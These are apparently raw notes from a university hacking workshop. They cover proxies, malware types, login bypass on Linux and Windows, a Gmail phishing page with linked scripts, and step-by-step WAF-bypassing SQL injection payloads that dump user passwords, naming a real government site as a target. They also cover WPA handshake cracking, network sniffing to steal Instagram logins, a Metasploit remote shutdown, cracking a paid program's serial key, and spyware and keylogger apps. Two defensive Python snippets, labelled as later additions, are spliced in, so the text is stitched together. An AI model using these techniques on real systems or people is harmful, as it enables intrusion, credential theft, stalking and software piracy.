- fb.com/rahultyagiofficialpage
- instagram.com/iamrahultyagi
- twitter.com/rahultyagihacks
- Day 1 - LPU
- Introduction to Cyber Security
- Cyber Security is a part of the IT ecosystem of private organisations, Govt. agencies and individual lives.
- Threats for Banking Sectors
- -> Ransomwares
- -> DDOS Attacks
- -> Social Engineering Attacks
- -> Web Application Attacks
- -> SQL Injection
- Threats to the Govt.
- -> National Security
- -> Critical Infrastructure
- Privacy to Citizens
- -> Identity Theft
- -> Critical Information Disclosure in Public
- -> For CSE -> Application + Network + Mobile
- -> For ECE -> Next Generation Secure Hardware Code
- -> Mechanical -> Aviation + Automobile
- -> Civil -> Smart cities
- -> Others
- Basics of Networking
- -> Network : A collection of devices with the common purpose of exchanging information and sharing peripheral devices is known as a network.
- LAN MAN WAN PAN
- -> IP address : It's like your phone number
- Local IP : LAN and MAN
- Total : 255*255*255*255=????
- LAN and MAN
- 192.168.1.1
- 172.16.1.1
- 10.0.0.1
- Windows: cmd -> ipconfig
- Linux/Unix/Mac: -> terminal -> ifconfig
- Connection-specific DNS Suffix . : localdomain
- Link-local IPv6 Address . . . . . : fe80::c01f:cb7e
- IPv4 Address. . . . . . . . . . . : 192.168.235.198
- Subnet Mask . . . . . . . . . . . : 255.255.255.0
- Default Gateway . . . . . . . . . : 192.168.235.2-> Mobile IP address
- Global IP : IP address given by the ISP to connect to the world.
- whatismyip.com
- -> Automated IP : Hotspot and Router Network
- -> Know Your IP Local and Global
- -> Privacy on Internet
- -> Secure Communication
- -> Secure Communication : Proxy and VPNs
- Web Based Proxy: When you use a website to change your IP address.
- www.hidemyass.com
- www.kproxy.com
- www.ninjaproxy.com
- and so on...
- Standalone Proxy Servers
- When you use application software to change the IP address by going through a non-traditional port for the communication.
- Filters : Port 80,8080 or 443
- Bypass: Application -> 9999, 7777, etc.
- Ultra Surf 1.44MB
- Hotspot security shield
- Download: https://ultrasurf.us/
- VPNs:
- -> LPU VPN
- -> ProXPN
- -> TOR Network
- Watch Here : https://www.youtube.com/watch?v=DkEqWGF3cvg
- Cryptography and Steganography
- Cryptography takes care of two types of data.
- 1. residing data 2. Transit data
- Steganography : Where the goal of cryptography is to scramble the data and information so the third party cannot read it, the goal of steganography is to HIDE the data from the third party.
- Information Gathering and Cyber Crime Tackling
- -> Email Tracing : Identifying Origin of Email
- Fake Emails:
- -> Email Websites : ekmei.cz
- -> Own PHP EMail Script for Fake Emails: github
- -> People Search + Information Gathering of People
- com.lullar.com --> People Email Searching
- -> jantakhoj.com : Gathering intellectual information about anyone, anywhere.
- -> Shutting Down Illegal Websites and Blogs
- Information gathering about a website which is not available on the website itself.
- -> lpu.in
- whois.domaintools.com
- Email to : abuse@registrar.schlund.info
- Subject: Report Abuse to Domain ID: D425500000000413781-AGRS
- Body: Sir this website is hosting illegal content bla bla bla and infinity bla.
- Regards
- Bla Bla Brother
- -> IP address Tracing and Grabbing of Criminal
- -> www.whatstheirip.com
- -> www.fuglekos.com/ip-grabber/
- Link: https://goo.gl/UBr6wD
- IP address: 107.167.108.173
- iplocation.net : Find ISP Behind the IP address.
- -> Case Study : Jaipur College Confession Page - 2013
- Malwares
- -> Types of Malwares
- Virus : Code which infects systems and makes them unstable in working.
- PS: A true virus cannot spread from one computer to another computer without human assistance.
- Worms : It can spread from one place to another without human assistance.
- Trojans : AKA RATs (Remote Accessing Tools), used to infect systems and then control the overall functionality of the system remotely from anywhere in the world.
- Adwares : Malwares designed to trick users into clicking on ads and then generate money from the clicks.
- - To get rid of these attacks, get the UBlock plugin in Mozilla Firefox.
- Ransomwares : Once it infects your computer, it encrypts the data with minimum 1024 bit encryption and then asks for money to get it back.
- Types:
- Tricky ransomwares : Children
- Direct ransomwares : Private Sector
- Spywares : Malware that spies and steals credentials like username, password, credit card details, chats and so on, and then blackmails the person.
- Rootkits : Infect the ROM level of the OS, hence no one can detect them.
- Botnets : Millions of computers get infected by the criminal, who uses them for the DDOS attack.
- -> Basic Virus Code in Batch Scripting
- -> Trojans
- -> Types of Trojans
- Download: https://ufile.io/b07a1
- Protection from Malwares
- -----------------------
- 1. Viruses and Worms
- -> USB Disk Security
- 2. No Virus thanks exe radar pro
- Cyber Forensics
- -> Recovering data from HDD, Memory card, Pen Drives, Portable HDD
- -> EaseUS Data Recovery Professional
- Download: https://ufile.io/cce751
- 1GB Pendrive: MB : 900MB
- Index Data Size
- 1010 setup.exe 100MB
- 1111 Movie720P.mp4 700MB
- -> Stellar Data Recovery: Data Recovery Software - Law Enforcement and Professional Nehru Place recovery Softwares
- System Hacking: Bypassing Login of Windows/ Linux/ Mac OS
- Linux :Bypassing Kali Linux Password
- Step 1: Select Recovery Mode and press E
- Step 2: Change ro to rw and add init=/bin/bash at the end of line and Press F10
- Step 3: Reset password by typing passwd root and press enter
- Step 4: Type new password and restart the system
- Bypassing Ubuntu System Password
- Step 1: Go to Safe mode
- Step 2: Recover Mode
- Step 3: Select the second last option from the list i.e SHELL
- Step 4: type passwd root
- Step 6: Give the new password and confirm password and restart the machine.
- Step 7: Fill the new password and enjoy :) .
- Windows: Cracking Windows Login Credentials
- 0-----------------------------------------0
- Windows Stores its password in hash format in a file known as SAM(Security Accounts Manager).
- C:/windows/system32/config/sam
- Active Password Changer
- Step 1: Hirenboot CD bootable
- Step 2: Boot it and select Boot into AERO Mode
- Step 3: Select Hiren BOOT CD Tools
- Step 4: Select 3rd option password changer
- Step 5: Select ACTIVE PASSWORD changer and remove your hands from the keypad.
- Step 6: Select 2nd option ms SAM file
- Step 7: Select the account which you want to reset
- Step 8: Change the password
- Step 9: Restart
- Step 10: No password is there Cheers!!! :)
- Day 2
- -----
- Email Hacking: Email hacking is a method or technique in which we trick the user with social engineering to enter his/her credentials mainly userid and password and then login into the account.
- There are many ways through which you can attack any email service.
- 1. Bad Passwords
- ->phone numbers -> 45%
- - char : rahul
- - numeric: 93333333
- - special:
- - complex: R@Hu7
- - Dictionary based Password: chair, donkey,temple,punjab
- - Pass Phrases aka Robust Password
- - *iG3sImG*
- 2. Phishing : It's a technique in which we make a fake clone page of any login panel and then trick the user into filling the details inside it. It's not only related to passwords; these days criminals directly get credit card details and so on, which can make money for them directly.
- 1. Simple Phishing
- 2. Spear Phishing
- 3. IDN Homograph Phishing
- 4. Vishing
- 5. Smishing
- Phishing
- --------
- 1. Gmail Fake Page
- 2. PHP Script
- 3. Logs.txt
- Making Computer As Server: XAMPP Server
- Download: apachefriends.org
- C:/xampp/htdocs/gmail
- Download Gmail: https://pastebin.com/XCn5WB9q
- Nokia.php: https://pastebin.com/QJ4pEUye
- email=rahul@gmail.com
- password=12345
- GET Method
- IDN Homograph Attack
- --------------------
- https://en.wikipedia.org/wiki/IDN_homograph_attack#Cyrillic
- "Deepika padukon and other using russian p"
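
A defender-side check for the IDN homograph trick referenced above (the "Russian p"), added here as an example and not part of the original notes: it flags hostname labels that mix scripts or are written entirely in Cyrillic lookalike letters, and returns the xn-- form that a proxy or mail filter would log. The CONFUSABLES map and the sample hostnames are constructed and not exhaustive.

```python
import unicodedata

# Constructed map of Cyrillic letters that render like Latin ones (not exhaustive).
CONFUSABLES = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
               "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i"}

def script_of(ch):
    """Coarse script name taken from the Unicode character name."""
    if ch.isdigit() or ch == "-":
        return "COMMON"
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]  # LATIN, CYRILLIC, ...

def check_hostname(host):
    """Return the ASCII (xn--) form of a hostname plus homograph findings."""
    findings, ascii_labels = [], []
    for label in host.lower().split("."):
        if label.startswith("xn--"):  # decode the ASCII-compatible form first
            label = label[4:].encode("ascii").decode("punycode")
        scripts = {script_of(c) for c in label} - {"COMMON"}
        # Skeleton: what the label looks like once lookalikes are read as Latin.
        skeleton = "".join(CONFUSABLES.get(c, c) for c in label)
        if len(scripts) > 1:
            findings.append(("mixed-script", skeleton, sorted(scripts)))
        elif scripts == {"CYRILLIC"} and skeleton.isascii():
            findings.append(("whole-script-lookalike", skeleton, ["CYRILLIC"]))
        ascii_labels.append(label if label.isascii()
                            else "xn--" + label.encode("punycode").decode("ascii"))
    return {"ascii": ".".join(ascii_labels), "findings": findings}

# Constructed samples: plain Latin, one Cyrillic "a", an all-Cyrillic lookalike,
# and a genuine Cyrillic word that should not be flagged.
SAMPLES = ["paypal.com", "\u0430pple.com", "\u0441\u043e\u0441\u043e.com",
           "\u043f\u0440\u0438\u043c\u0435\u0440.com"]

if __name__ == "__main__":
    for h in SAMPLES:
        print(check_hostname(h))
```
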
- 2. Keyloggers
- -> Local Keylogger: Family Keylogger 0.22MB
- Download: http://www.spyarsenal.com/download.html
- Home Work-> Remote Keyloggers: Ardamax Keylogger - Paid
- Always use two step verification in gmail.
- Web Application Hacking and Security
- ------------------------------------
- OWASP Top 10 Attacks
- A1 Injection.
- A2 Broken Authentication and Session Management.
- A3 Cross-Site Scripting (XSS)
- A4 Insecure Direct Object References.
- A5 Security Misconfiguration.
- A6 Sensitive Data Exposure.
- A7 Missing Function Level Access Control.
- A8 Cross-Site Request Forgery (CSRF)
- A9 Unvalidated Redirects and Forwards
- A10 Using Components with Known Vulnerabilities
- Google Dorks
- ------------
- search for required query of the sql in google "search google for syntax"
- Injections: SQL Injection
- -------------------------
- Website: A collection of webpages is known as a website.
- Static Websites: When a website is designed in pure HTML and has no database attached to it, we can say it's a pure static site, mainly in read-only mode.
- Dynamic Websites: When a website carries many user interaction points from where the user can send data or information into the website with the help of database connectivity, we can say this is a dynamic website.
- For Example: FB and Gmail.com etc.
- Attacking Websites from Google Dorks
- --------------------------------------
- Getting the Critical Information Holding databases from Google.
- Title : Blue
- URL : Green
- Content : Black
- Every website takes care of the dump of the SQL file as a backup every day.
- SQL Injection: When we send malicious SQL code to the website and try to execute it in the database for any desired output.
- username=?
- password=?
- Login
- select * from users where username='?''or'1'='1 and password='?''or'1'='1
- 'or'1'='1
- How to attack and test security for websites which are protected from Simple SQL Injection and also backed up by Web Application Firewalls designed to protect from hackers.
- Target : target.com (Example)
- Attack Auditing: Advance SQL Injection with WAF Bypassing
- Step 1: multan.gov.pk . Find any GET method in the URL of the website.
- GET METHOD : .php?id=10
- POST METHOD : .php
- Step 2: Check the validation and Exception Handling of the website URL
- target.com/files.php?id=1'
- Step 3: Check the total number of columns there are except ID.
- target.com/files.php?id=1 order by 1--+
- Step 4: Dump the structure of the two columns on the right-hand side.
- target.com/files.php?id=1 union select 1,2--+
- Attack 1 to Bypass : Upper Lower Case Injection
- UnIoN sElEcT
- target.com/files.php?id=1 /*!UnIoN*/+/*!sElEcT*/ 1,2--+
- Attack 2
- --------
- Inline Execution Comments
- /*UnIoN*/+/*!sElEcT*/
- Attack 3
- --------
- Version Based Inline Executable Comments
- MY-SQL VERSIONS
- 5.00.00 When We type in URL : 50000
- 4.00.00 When We type in URL : 40000
- 3.00.00 When We type in URL : 30000
- 2.00.00 When We type in URL : 20000
- 1.00.00 When We type in URL : 10000
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,database()--+
- Database --> Tables -> Columns/ROws -> data
- Get the Tables
- schema: In the database, the schema holds the responsibility of taking care of the entire structure of the database.
- Information of all the tables i.e Index
- Information of all the columns i.e Index
- Table: information_schema.tables
- Columns: information_schema.columns
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+
- Target Table: users
- Get the columns of the users table
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+
- Get the login and password
- target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,password from users--+
- Security Tips for Developers
- ------------------------------
- 1. Always use Escape Character Validation at client side and server side.
- 2. Do not use GET methods on requests in website
- 3. Always use stored procedures
- 4. Never accept special character in the login fields or any other fields of the website.
- 5. Do see the OWASP TOP 10 attacks security guidelines before starting a new development project. Via owasp.org
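
One way to apply the developer tips above, added here as an example and not part of the original notes: the login query built by string concatenation (the form the `'or'1'='1` input from these notes works against) next to the same query with placeholders, plus a strict integer check for a `files.php?id=` style parameter. It uses Python's sqlite3 in memory as a stand-in for the site's database; the table layout, rows and function names are assumptions.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret-hash"), (2, "rahul", "other-hash")])
    db.executemany("INSERT INTO files VALUES (?, ?)",
                   [(1, "notes.pdf"), (2, "slides.pdf")])
    return db

def login_concat(db, username, password):
    """'Before': user input is pasted into the SQL text, so quotes change the query."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return db.execute(sql).fetchall()

def login_param(db, username, password):
    """'After': placeholders keep the input as data, never as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

def get_file(db, raw_id):
    """id parameter hardened: strict integer check plus a placeholder."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return db.execute("SELECT title FROM files WHERE id=?", (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "'or'1'='1"  # the input shown in the notes
    print("concatenated:", login_concat(db, payload, payload))
    print("parameterized:", login_param(db, payload, payload))
    print("valid login:", login_param(db, "admin", "s3cret-hash"))
    print("file 1:", get_file(db, "1"))
```
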
- Wifi Hacking and Security
- -------------------------
- WiFi stands for Wireless Fidelity. It works on the 802.11a protocol onwards.
- Security
- --------
- WEP , WPA and WPA-2 PSK Authentication
- WEP stands for Wired Equivalent Privacy. It is 802.11's first hardware form of security where the user and WAP are configured with an encryption key of either 64 bits or 128 bits in HEX. It works in such a way that when the user attempts to authenticate, the AP issues a random challenge. The user then returns the challenge, encrypted with the key; the AP decrypts this challenge, and if it matches the original the client is authenticated, otherwise not. The problem with WEP is that the key is static, which makes it vulnerable: by using some tools a hacker could use reverse-engineering to extract the encryption key. This process affects the transmission speed.
- WPA stands for WiFi Protected Access. It builds upon WEP, to make it more secure by adding extra security mechanism and algorithms to stop unauthorized access. WPA delivers a level of security way beyond anything that WEP can offer. WiFi compliance ensures interoperability between different manufacturer’s equipment. WPA bridges the gap between WEP and 802.11i networks, and has the advantage that the firmware in older equipment may be upgradeable. It's a new security standard adopted by the WiFi Alliance consortium.
- WPA2 is similar to WPA, except that it adds extra encryption called AES-CCMP. The primary difference between WPA and WPA2 is that WPA2 uses a more advanced encryption technique called AES (Advanced Encryption Standard), allowing for compliance with FIPS140-2 government security requirements. We prefer WPA2 because it has more than three protection levels, making it nearly impossible for computer guru hackers to break the encryption. AES is so good that it blocks statistical analysis of the cipher text. WPA2 is based upon the Institute for Electrical and Electronics Engineers’ (IEEE) 802.11i amendment to the 802.11 standard, which was modified on July 29, 2004.
- To Attack and Test the Wifi Security
- -----------------------------------
- 1. Kali Linux OS www.kali.org 2.0 onwards
- 2. TP-LINK External Wifi Adapter: http://dl.flipkart.com/dl/tp-link-tl-wn722n-150mbps-high-gain-wireless-usb-adapter/p/itmdzusgbtfhhadq?pid=USBDZUSDGUZBGBXR&affid=officialra
- 3. airmon-ng : This application is used to detect the hardware of the card.
- 4. airodump-ng : This will help you to select and target a particular wireless hotspot which we want to hack.
- 5. aircrack-ng : After capturing the KEY of wifi we have to decrypt it or crack it with the help of aircrack-ng.
- rahul-->!@#$%
- !@#$% -> X Decrypt this into rahul again.
- Good News
- We know the algorithm which converts text into hash.
- !@#$% !@#$% <--rahul<-- Dictionary 70%
- pankaj
- gaurav
- hello
- rahul
- Path : usr/share/wordlists/rockyou.txt.gz
- steps for hacking wifi with kali
- steps -> to check if wifi is able for hacking, open "airmon-ng" in terminal
- -> type "airmon-ng start wlan0"
- -> kill if some PIDs are giving problems
- -> "kill 2798" or error you have
- -> "clear" to clear the screen
- -> type "airodump-ng mon0" to dump files
- -> copy mac id and channel number and type "airodump-ng --bssid 'enter mac id' -c 'channel number' -w key mon0"
- -> then press ctrl+z to stop capturing and find key in home>key-01.cap
- -> the key will be in one way algorithm
- -> open dictionary at "usr/share/wordlists/rockyou.txt.gz"
- -> type this to extract rockyou.txt.gz: "gunzip rockyou.txt.gz", but select the file first from desktop or wherever the file is
- -> type to compare "aircrack-ng key-01.cap -w rockyou.txt"
- -> the password will be shown; the wifi handshake must come in the beginning, where we are capturing data.
- steps for creating fake hotspot
- steps -> start ettercap -G
- -> start unified sniffing
- -> select your wifi
- -> select hosts
- -> scan for hosts
- -> select host list
- -> select adapter as target one and other as target 2
- -> go to mitm and open remote connection > sniff
- -> start > start sniffing
- -> urlsnarf -i wlan0
- -> start driftnet
- to hack insta use
- -> bettercap
- -> bettercap -I wlan0 --proxy -P POST
- using (metasploit) to shut down other pc on same network remotely
- steps -> msfconsole
- -> search maxchannel
- -> use "auxilll...........lids"
- -> show options
- -> nmap 'ip' to check if any of the victim's ports is open
- -> set RHOST 'ip'
- -> show options
- -> exploit
- Game Hacking
- ------------
- Game Download: https://ufile.io/926c6
- Cheat Engine Download: https://ufile.io/c2c932
- Reverse Engineering: Cracking Applications
- ------------------------------------------
- software cracking
- use windows xp 32 bit
- Software : olly dbg
- Target : Perfect Keylogger
- Price: $49 Approx
- Download: http://www.blazingtools.com/downloads.html
- Steps
- ->start olly dbg
- ->close all windows
- ->file>open>exe file of application
- ->assembly code of exe will show up
- ->view>executable module or alt+e
- ->look for name of app or something related to it and double click on it
- ->right click>search for all referenced text strings
- ->search for the message which the application shows at the beginning to enter the code
- ->double click on line or message
- ->a black line is coming on left; it means a function. If the message is at the end, go with the black line to the top to find the stuff in function
- ->now put a break point at the start of this function using f2
- ->a red line shows a break line is applied
- -> now run the program using play.
- ->now enter your name and key 'fake one'
- ->red line will change into black and application will pause .
- -> execute the line one by one using f8 and keep a look at the output in console window
- ->then two keys will appear in lower outputs and first one will be ours and second one will be the original one ,
- ->now copy the new key , exit the application
- ->open app , enter same username you used earlier and paste the copied key.
- Mobile Hacking
- --------------
- 1. Android Deleted Whatsapp,Skype Chat Recovery | Bypassing Lock Screen
- Download:https://tinyurl.com/htm42kd
- Crack: http://www94.zippyshare.com/v/4S8Dw8VW/file.html
- LUCIDROID
- airdroid
- spyhuman "looks nice and is free"
- TruthSPY
- Spy2Mobile
- MaxSpy
- Overcraft
- 2. Rooting : King Root.apk
- Jailbreaking : Pangu and Taiji Jailbreak